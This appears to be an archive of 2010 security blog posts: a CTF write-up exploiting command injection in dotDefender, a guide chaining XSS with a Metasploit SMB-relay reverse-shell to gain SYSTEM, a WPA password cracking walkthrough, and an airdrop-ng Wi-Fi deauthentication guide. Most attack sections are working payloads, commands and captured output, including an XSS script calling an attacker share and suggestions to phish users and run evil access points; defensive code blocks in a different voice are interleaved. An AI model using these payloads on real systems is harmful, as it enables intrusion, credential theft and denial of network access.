Social Networking:

So I remembered the hints said to stay in touch via Twitter and IRC. I popped up the IRC channel and it's a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better than to ask Muts a direct question; I already know the answer.. “TRY HARDER”, Offensive Security's mantra, which answers every inquiry. So instead I got some Redbull and thought it over for a bit, and noticed that the IRC channel said the passwords were now reset to the original values.

Dot Defender again:

Knowing that the only password not behind Dot Defender's tyrannical rule was the basic auth login for Dot Defender itself, I decided to give Dot Defender a second go. The very first combination I tried popped open the application with the password of “password” and a # symbol at the end of the index page value; someone had suggested I try the # earlier.

Apparently the first few people past the login had started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from Full Disclosure.. :)

Post Auth:
Opening up Burp Proxy, a well known application proxy, I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in Burp by the name of “Repeater”; Repeater allows you to keep making the same request over and over again, manually manipulating the values. Since I had an example delete request, and I had the delete example from the Full Disclosure vulnerability, I modified my request with the vulnerable values.

POST /dotDefender/index.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

sitename=testsite&deletesitename=testsite;id;ls -al;

In the web response was the output of my command injection. I injected an “ls” command, which in Unix lists the contents of a directory. I thought to myself, ok so that's cool, but I need to find a certain file to show that I passed the challenge. Running Burp requests looking for this file is waaaaay too tedious for me. So I used another familiar Unix command, the “find” command.

sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12

The n00bSecret file was found quickly, so I used the “cat” command to print the contents of the file with the proof of passing the first challenge.

sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12
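The deletesitename field above works because the server side splices it straight into a shell command line. As an added example (mine, not dotDefender's code or the advisory's), here is that anti-pattern next to the hardened form, plus a small check that flags form fields carrying shell metacharacters, run over the post's own request body. The /var/sites path, the site-name allowlist and the rm command are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed policy: what a site label is allowed to look like.  dotDefender's
# real validation rules are not on the page.
SITE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
SHELL_META = re.compile(r"[;&|`$<>\n\r]")
SITES_DIR = "/var/sites"  # hypothetical location of per-site data


def parse_form(body: str) -> dict:
    """Minimal application/x-www-form-urlencoded parser.  Splits on '&' only,
    so a ';' inside a value survives, which is exactly what we want to see."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def vulnerable_delete_command(deletesitename: str) -> str:
    """The anti-pattern: the request field becomes part of a shell command
    string.  Returned rather than executed so its effect can be inspected."""
    return f"rm -rf {SITES_DIR}/{deletesitename}"


def is_valid_site_name(deletesitename: str) -> bool:
    return SITE_NAME.fullmatch(deletesitename) is not None


def safe_delete_argv(deletesitename: str) -> list:
    """Hardened form: strict allowlist validation, then an argv list that is
    handed to the OS without a shell (subprocess.run(argv) with shell=False),
    so there is no command line for ';' to split."""
    if not is_valid_site_name(deletesitename):
        raise ValueError(f"rejected site name {deletesitename!r}")
    return ["rm", "-rf", f"{SITES_DIR}/{deletesitename}"]


def suspicious_fields(body: str) -> list:
    """Detection side: which form fields carry shell metacharacters?"""
    return [k for k, v in parse_form(body).items() if SHELL_META.search(v)]


# The post's own request body, copied from the page.
INJECTED_BODY = "sitename=testsite&deletesitename=testsite;id;ls -al;"

if __name__ == "__main__":
    fields = parse_form(INJECTED_BODY)
    print("shell would run:", vulnerable_delete_command(fields["deletesitename"]))
    print("flagged fields:", suspicious_fields(INJECTED_BODY))
    try:
        safe_delete_argv(fields["deletesitename"])
    except ValueError as err:
        print("hardened handler:", err)
    print("clean argv:", safe_delete_argv("testsite"))
```

The validation is an allowlist on purpose: stripping ';' from the value would leave every other metacharacter to find, while rejecting anything that is not a plausible site label needs no list of bad characters at all.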

I browsed out to the contest scoreboard page and added in my shiny new proof key immediately, since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted! 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!

Mexican food:
At this point I decided it was time for some Mexican food; I had been fiendish for some chips and salsa all day long. I passed the n00b challenge as the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled until 24 hours after this point.. :) Not too horrible, but again could be much better!!

Lessons Learned:

Don't second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with, and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours, or even 30 min if I was quick with it.

Dot Defender Remediation:

There is a patch available for this vulnerability from Applicure, just patch your app!! Also, according to this other post by Applicure, it only affects Linux running Apache. Response by Applicure in the link below.

Next up, how to own killthen00b 

Thursday, April 15, 2010

Combining XSS and SMB-Relay

I found this to be an interesting way to make XSS useful in, say, an internal pentest on a local application, or perhaps on a client side test via emails to users you enumerated through Google hacking or Maltego. You can simply use XSS to call a non-existent share on a host running a listener and force a Windows user to issue their hashes to your listener and gain a shell.

Setting up SMB_Relay in Metasploit:
Open up a metasploit session:

root@ficti0n:~# /pentest/exploits/framework3/msfconsole

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 490 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8091 updated 6 days ago (2010.01.09)

msf > use exploits/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set LHOST  <-- Whatever this metasploit server is
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started reverse handler on port 4444
[*] Server started.

XSS your Client:
Once your listener is set up on your BackTrack server running Metasploit you can then run your cross-site scripting attack against the client. This attack can be accomplished with the following script string, which tries to open a share on the attack server. Put the string below into any parameter that is vulnerable to cross site scripting, just change the IP address to the IP address of your server which is running the Metasploit smb_relay listener.

<script language='Javascript' src="\\\c$"></script>

When the XSS link is clicked you will see network hashes race across the output of the Metasploit console. Basically the client that is being XSS'd is sending over their Windows credentials to try to open a network share. Metasploit at this point is passing the hashes back to the client and opening a meterpreter session, gaining shell access. This is how it's working as I understand the process.

[*] Authenticating to as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from, attack already in progress.
[*] Sending Access Denied to Ficti0n-1C10DB\Administrator
[*] Received \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Sending Access Denied to \
[*] Received Ficti0n-1C10DB\Administrator LMHASH:ff227wf24924844095c91577w265de85ebb20w9e9f146319 NTHASH:ff227df2492d844095c91577w265de85ebb20b9w4f178319 OS:Windows Server 2003 3790 Service Pack 2 LM:
[*] Authenticating to as Ficti0n-1C10DB\Administrator...
[*] AUTHENTICATED as Ficti0n-1C10DB\Administrator...
[*] Ignoring request from, attack already in progress.
[*] Sending Access Denied to Ficti0n-1C10DB\Administrator

At this point you can click into the Metasploit window and issue the following commands to take control of the client machine.

msf exploit(smb_relay) > sessions -l

Active sessions
Id  Description  Tunnel

1   Meterpreter ->

msf exploit(smb_relay) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >  

You are now logged into the client's machine as SYSTEM and can perform any actions that you wish under the context of a System account. Create users, dump hashes, and use the system as a jump point into other systems on the local network. This is all pretty simple stuff, but I thought it was pretty cool to just issue it from an XSS attack since I don't see good XSS examples too often; usually it's just how to grab a cookie.

Combining this with CFS:

Other good ideas for this attack would be to embed this into a header of a site you control via a cross frame scripting attack. You can then encapsulate a whole valid page in an iframe and the user will never know unless they look at the URL... however you can always just register a similar URL to trick a user while silently passing their credentials...

Of course, egress filtering of outgoing ports will prevent this attack.. most people do not egress filter, however.
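Whether or not the perimeter filters egress, the thing to watch for is a workstation opening SMB to anywhere but the file servers it is supposed to use. As an added example (mine, not part of the post or of Metasploit), here is that detection logic run over a few constructed firewall log lines: the log format, the 10.0.0.0/8 workstation network, the 10.0.0.5 file server allowlist and the 203.0.113.9 listener address (a documentation range standing in for an outside host) are all assumptions made for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

SMB_PORTS = {139, 445}
# RFC 1918 space counted as "inside".  The ipaddress module's is_private also
# treats documentation ranges such as 203.0.113.0/24 as private, so the
# networks are listed explicitly instead.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# File servers workstations are expected to reach over SMB (constructed allowlist).
KNOWN_FILE_SERVERS = {ipaddress.ip_address("10.0.0.5")}

# Constructed log format:  <timestamp> <verdict> TCP <src>:<sport> -> <dst>:<dport>
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<verdict>ACCEPT|DROP) TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass
class Flow:
    ts: str
    verdict: str
    src: ipaddress.IPv4Address
    sport: int
    dst: ipaddress.IPv4Address
    dport: int


def parse_line(line: str):
    """One log line -> Flow, or None for lines in another format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return Flow(m["ts"], m["verdict"], ipaddress.ip_address(m["src"]), int(m["sport"]),
                ipaddress.ip_address(m["dst"]), int(m["dport"]))


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL)


def classify(flow: Flow):
    """Reason an SMB flow deserves a look, or None.  Two cases: it left the
    network (what egress filtering stops) or it went to an internal host that
    is not a known file server (the internal-pentest case)."""
    if flow.dport not in SMB_PORTS or flow.dst in KNOWN_FILE_SERVERS:
        return None
    return "smb-unexpected-internal" if is_internal(flow.dst) else "smb-egress"


def scan(lines) -> list:
    """(timestamp, src, dst, reason, verdict) for every flagged flow.  A DROP
    is reported too: the client still tried, which is the interesting part."""
    findings = []
    for line in lines:
        flow = parse_line(line)
        if flow is None:
            continue
        reason = classify(flow)
        if reason:
            findings.append((flow.ts, str(flow.src), str(flow.dst), reason, flow.verdict))
    return findings


# Constructed sample log: normal file-server traffic, normal HTTPS to the
# outside, then SMB to the outside and SMB to an unexpected internal host.
SAMPLE_LOG = [
    "2010-04-15T10:01:02 ACCEPT TCP 10.0.0.15:51234 -> 10.0.0.5:445",
    "2010-04-15T10:01:05 ACCEPT TCP 10.0.0.15:51240 -> 203.0.113.9:443",
    "2010-04-15T10:01:07 ACCEPT TCP 10.0.0.15:51241 -> 203.0.113.9:445",
    "2010-04-15T10:01:09 DROP TCP 10.0.0.21:49152 -> 10.0.0.77:445",
    "not a firewall line",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The "smb-egress" finding is the one an outbound deny on 139/445 at the perimeter turns from an ACCEPT into a DROP; the "smb-unexpected-internal" one is only visible if the internal firewall or flow collector logs workstation-to-workstation traffic at all.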

Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I used to crack my WPA passwords with coWPAtty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSIDs and passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and password list in each database. If you are in an area with multiple SSIDs running WPA you can note all of the SSIDs in a list and import them into the database. This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4-way authentication handshakes with the same database file. Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.
Note: I assume you already have a packet capture of a handshake.... If not, just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel. I also assume you know the old way of cracking WPA.. If not I can post a guide on how to do that...

Setting up the databases:
First you need to create a SQLite3 database and import some SSIDs into the new database. If no database already exists, Airolib will create one for you automatically. Create a list of SSIDs from your Airodump output, then use the airolib command in the following format.

airolib-ng <database> --import essid <ssid list file>

Create SSID list:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...

Next, import your password list into the same database using the same format as when you added SSIDs, but replacing the keyword with passwd and supplying your password list. Here is the format, followed by an example.

airolib-ng <database> --import passwd <password list file>

Create Password List:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...

This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.

Clean Database:
root@ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
Query done. 2 rows affected.

Create your PMKs:
After you have imported all your SSIDs and passwords you can create the PMK hashes with the following command.

root@ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Now that you have a database of PMK hashes for the WPA SSIDs in your area you can run a crack against your output cap file to retrieve your password. If all goes well and the network's password is in your database, you are done.

root@ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
   #  BSSID                               ESSID                     Encryption
   1  00:18:F8:66:7E:CC        ficti0nAP               WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...

Another useful option: if you want to crack all the WPA networks but want to set the priority on a specific network, you can run the following SQL command to set that priority in the database.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.
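What --batch is actually precomputing, and why the SSID list matters, is easier to see in a few lines of code. As an added example (mine, not airolib-ng's or aircrack-ng's code) the block below derives the WPA/WPA2-PSK pairwise master key the way the standard defines it, PBKDF2-HMAC-SHA1 over the passphrase salted with the ESSID, stores one PMK per (ESSID, password) pair in an in-memory SQLite database with a prio column, and applies the same priority update the post runs. The schema is a constructed stand-in for airolib-ng's real one, the wordlist is constructed, and the "captured" value is a PMK derived from a known passphrase rather than a real handshake check (aircrack-ng verifies a candidate PMK against the EAPOL MIC of the capture; that step is not reproduced here).

```python
import hashlib
import sqlite3


def pmk(essid: str, passphrase: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key as defined in IEEE 802.11i:
    PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    This is the value computed once per (ESSID, password) pair by --batch."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, 32)


class PmkDatabase:
    """Simplified stand-in for the airolib-ng database.  The schema is
    constructed for this example (essid/passwd/pmk tables, prio on essid)
    and is not airolib-ng's actual schema."""

    def __init__(self, path=":memory:"):
        self.db = sqlite3.connect(path)
        self.db.executescript("""
            CREATE TABLE IF NOT EXISTS essid (essid TEXT PRIMARY KEY,
                                              prio INTEGER NOT NULL DEFAULT 64);
            CREATE TABLE IF NOT EXISTS passwd (passwd TEXT PRIMARY KEY);
            CREATE TABLE IF NOT EXISTS pmk (essid TEXT, passwd TEXT, pmk BLOB NOT NULL,
                                            PRIMARY KEY (essid, passwd));
        """)

    def import_essids(self, names):
        self.db.executemany("INSERT OR IGNORE INTO essid (essid) VALUES (?)", [(n,) for n in names])
        self.db.commit()

    def import_passwds(self, words):
        self.db.executemany("INSERT OR IGNORE INTO passwd (passwd) VALUES (?)", [(w,) for w in words])
        self.db.commit()

    def set_priority(self, essid: str):
        """The same statement the post runs: move one ESSID to the front."""
        self.db.execute("UPDATE essid SET prio = (SELECT MIN(prio) - 1 FROM essid) WHERE essid = ?",
                        (essid,))
        self.db.commit()

    def priority(self, essid: str) -> int:
        return self.db.execute("SELECT prio FROM essid WHERE essid = ?", (essid,)).fetchone()[0]

    def batch(self) -> int:
        """Compute every missing PMK, lowest prio first; returns how many."""
        todo = self.db.execute("""
            SELECT e.essid, p.passwd FROM essid e CROSS JOIN passwd p
            WHERE NOT EXISTS (SELECT 1 FROM pmk k WHERE k.essid = e.essid AND k.passwd = p.passwd)
            ORDER BY e.prio, e.essid, p.passwd
        """).fetchall()
        self.db.executemany("INSERT INTO pmk VALUES (?, ?, ?)", [(e, p, pmk(e, p)) for e, p in todo])
        self.db.commit()
        return len(todo)

    def lookup(self, essid: str, target: bytes):
        """Passphrase whose precomputed PMK for this ESSID equals target, or None."""
        row = self.db.execute("SELECT passwd FROM pmk WHERE essid = ? AND pmk = ?",
                              (essid, target)).fetchone()
        return row[0] if row else None


def demo():
    db = PmkDatabase()
    db.import_essids(["ficti0nAP", "Linksys"])                  # ESSIDs seen in the post's output
    db.import_passwds(["password", "letmein", "MyPassword"])    # constructed wordlist
    db.set_priority("ficti0nAP")
    computed = db.batch()
    # Stand-in for the handshake check: the PMK the network really uses.
    captured = pmk("ficti0nAP", "MyPassword")
    return computed, db.lookup("ficti0nAP", captured), db.lookup("Linksys", captured)


if __name__ == "__main__":
    print(demo())
```

The second lookup returning None is the whole point of the ESSID being the salt: a table built for "Linksys" is useless against "ficti0nAP" even when the passphrase is identical, which is why a unique SSID together with a long passphrase takes a network out of reach of any shared precomputed table.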

Monday, February 15, 2010

Airdrop-ng Basics on BT4 Final

De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG; it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related, and it seemed to work more consistently after installing Psyco. Below are my notes on using Airdrop-ng and also the information from ShmooCon 2010. This tool should be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.


Airdrop-NG is a wireless de-authentication tool released at ShmooCon 2010 which can also double as a poor man's WIPS, depending on your intentions. Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using client station MACs, BSSIDs and a few other descriptors. Rules can be updated while the program is running in a loop, making for easy on-the-fly changes within your attack. On each loop Airdrop-NG re-parses the rules file and continues sending packets based on a CSV output from Airodump-ng.

Below is a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against its BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed!  =)
Would you like to install lorcon? (y/n): y
Running svn co This may take a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c

copying build/lib.linux-i686-2.5/ -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)

Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...

Setup Wireless Interface:

root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Switch to another shell and run airodump:
(leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH  6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:5B:6B:4E:6C:6F   -1       26        1    0  11  54 . WEP  WEP         Testing
 02:1F:28:65:AE:ED  -24      489      391    0   1  54e  WPA2 CCMP   PSK  ficti0nsAP
 00:0B:85:6C:2D:4F  -71       48        0    0   1  54 . WEP  WEP         Linksys
 00:1B:85:6E:2D:4D  -72       48        0    0   1  54 . WEP  WEP
 06:0B:85:6C:7D:4E  -71       45        0    0   1  54 . OPN   

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   02:16:08:AD:6E:95  -67    0 - 1      0        3
 (not associated)   00:A0:F8:B8:DF:69  -73    0 - 1    120       39  Linksys
 (not associated)   00:24:36:74:F1:97  -53    0 - 1      0       57
 02:0B:65:4E:6C:62  02:17:6B:20:00:ED  -72    0 - 1    124       27
 02:1F:28:65:AE:ED  00:23:4E:DF:AE:70    0   54e- 1e   979      444
 02:1F:28:65:AE:ED  00:21:00:DB:60:00  -28    0 - 1     67       91  ficti0nsAP
 02:1F:28:65:AE:ED  00:21:6A:11:0E:52  -38    1e- 2e     0      212  ficti0nsAP
 02:1F:28:65:AE:ED  00:2E:45:9F:87:AC  -38    1e- 6e     0      194  ficti0nsAP
 02:1F:28:65:AE:ED  00:23:3E:DF:ED:ED  -42   54e- 1      0       63  ficti0nsAP
 02:1F:28:65:AE:ED  00:25:08:AD:50:7C  -51   54e-24      0        2
 02:1F:28:65:AE:ED  00:1E:C2:C4:E5:79  -67    1e- 1      0       94  ficti0nsAP

Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients. I will explain a bit about the rules from the ShmooCon presentation, then we will add a rule to our rules.conf.

Rules are broken down into 3 fields: (Action/ap|clients):

2 options for state field:


5 options for AP field:
-Company OUI name value
-Company OUI numeric value

5 options for clients field
-multiple macs  (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value

Add your rule Example:
Below is a rule that denies all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID

Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50

Rule explanation:
d = deny
/02:1F:28:65:AE:ED      <-- get this AP address from the airodump output
|01-23-5E-DF-AE-50      <-- in this case a client's address

Run airdrop with new rule:
(Leave airodump running during this!!)
Now run Airdrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process. This will hopefully keep your victim from having network access.

root@ficti0n:~/# python -b -i mon0 -t /root/Test-01.csv  -r docs/dropRules.conf
#             Welcome to AirDrop-ng             #

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid


Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode

Poor Man’s WIPS:

Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MACs:


Create the list of your AP BSSIDs:

Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00

Allow 3 clients to talk to EA:CF:DF:AD:00:00

Deny those 3 clients to any other access points

MITM Attacks:
An attempted example from ShmooCon was an attack on clients via MITM. This example wasn't shown during the demo because the presenters couldn't get their monitors working correctly.. But I imagine the ruleset would be to deny all clients access to the legitimate BSSIDs within your airodump output and allow them all access to your KARMA or perhaps Fon AP. The presenters had their own FonRules, which I am guessing would go something similar to the following, but I could be way off; this however should function similarly to what I think they were going to show us.

Make a list of local BSSIDs:



Add In some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00

Deny 3 clients to talk to EA:CF:DF:AD:00:00

Allow access to my evil APs:

I have a couple of other ideas for IDS monitoring combining other tools, and also some malicious MITM I am messing around with, that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...